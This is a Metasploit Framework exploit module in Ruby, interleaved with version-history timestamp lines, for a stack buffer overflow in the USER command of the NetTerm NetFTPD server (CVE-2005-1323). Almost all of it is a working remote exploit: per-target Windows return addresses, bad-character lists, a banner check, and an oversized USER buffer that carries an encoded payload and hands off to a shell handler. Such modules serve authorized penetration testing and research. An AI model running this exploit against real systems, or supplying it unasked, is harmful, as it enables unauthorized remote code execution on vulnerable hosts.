2007-02-18 01:10:39 +01:00
|
|
|
##
|
2007-03-01 09:21:36 +01:00
|
|
|
# $Id$
|
2007-02-18 01:10:39 +01:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 16:33:26 +02:00
|
|
|
# http://metasploit.com/framework/
|
2007-02-18 01:10:39 +01:00
|
|
|
##
|
|
|
|
|
|
|
|
|
2005-11-26 01:04:26 +01:00
|
|
|
require 'msf/core'
|
2005-11-24 20:04:37 +01:00
|
|
|
|
|
|
|
|
2008-10-02 07:23:59 +02:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 06:50:37 +01:00
|
|
|
Rank = GreatRanking
|
2005-11-24 20:04:37 +01:00
|
|
|
|
2008-10-02 07:23:59 +02:00
|
|
|
include Msf::Exploit::Remote::Ftp
|
2005-11-24 20:04:37 +01:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'NetTerm NetFTPD USER Buffer Overflow',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a vulnerability in the NetTerm NetFTPD
|
|
|
|
application. This package is part of the NetTerm package.
|
|
|
|
This module uses the USER command to trigger the overflow.
|
|
|
|
},
|
|
|
|
'Author' => [ 'hdm' ],
|
2006-01-21 23:10:20 +01:00
|
|
|
'License' => MSF_LICENSE,
|
2005-11-24 20:04:37 +01:00
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
|
|
|
[
|
2009-07-16 18:02:24 +02:00
|
|
|
[ 'CVE', '2005-1323'],
|
|
|
|
[ 'OSVDB', '15865'],
|
2005-11-24 20:04:37 +01:00
|
|
|
[ 'URL', 'http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'],
|
|
|
|
[ 'BID', '13396'],
|
|
|
|
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 1000,
|
|
|
|
'BadChars' => "\x00\x0a\x20\x0d",
|
2006-07-31 02:41:02 +02:00
|
|
|
'StackAdjustment' => -3500,
|
2005-11-24 20:04:37 +01:00
|
|
|
|
|
|
|
},
|
|
|
|
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[
|
2005-11-24 20:45:46 +01:00
|
|
|
'NetTerm NetFTPD Universal', # Tested OK - hdm 11/24/2005
|
2005-11-24 20:04:37 +01:00
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Ret' => 0x0040df98, # netftpd.exe (multiple versions)
|
|
|
|
},
|
|
|
|
],
|
|
|
|
[
|
|
|
|
'Windows 2000 English',
|
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Ret' => 0x75022ac4, # ws2help.dll
|
|
|
|
},
|
|
|
|
],
|
|
|
|
[
|
|
|
|
'Windows XP English SP0/SP1',
|
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Ret' => 0x71aa32ad, # ws2help.dll
|
|
|
|
},
|
|
|
|
],
|
|
|
|
[
|
|
|
|
'Windows 2003 English',
|
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Ret' => 0x7ffc0638, # peb magic :-)
|
|
|
|
},
|
|
|
|
],
|
|
|
|
[
|
|
|
|
'Windows NT 4.0 SP4/SP5/SP6',
|
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Ret' => 0x77681799, # ws2help.dll
|
|
|
|
},
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Apr 26 2005',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
connect
|
|
|
|
disconnect
|
|
|
|
if (banner =~ /NetTerm FTP server/)
|
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
end
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
connect
|
|
|
|
|
|
|
|
print_status("Trying target #{target.name}...")
|
|
|
|
|
|
|
|
# U push ebp
|
|
|
|
# S push ebx
|
|
|
|
# E inc ebp
|
|
|
|
# R push edx
|
|
|
|
# \x20\xC0 and al, al
|
|
|
|
|
2007-03-01 09:21:36 +01:00
|
|
|
buf = rand_text_english(8192, payload_badchars)
|
2005-11-24 20:04:37 +01:00
|
|
|
buf[0, 1] = "\xc0"
|
|
|
|
buf[1, payload.encoded.length] = payload.encoded
|
2005-11-24 20:28:47 +01:00
|
|
|
buf[1014, 4] = [ target.ret ].pack('V')
|
2005-11-24 20:04:37 +01:00
|
|
|
|
2005-11-25 05:11:22 +01:00
|
|
|
send_cmd( ["USER #{buf}"] )
|
|
|
|
send_cmd( ['HELP'] )
|
2005-11-24 20:04:37 +01:00
|
|
|
|
|
|
|
handler
|
2006-01-08 15:27:59 +01:00
|
|
|
disconnect
|
2005-11-24 20:04:37 +01:00
|
|
|
end
|
|
|
|
|
2009-07-16 18:02:24 +02:00
|
|
|
end
|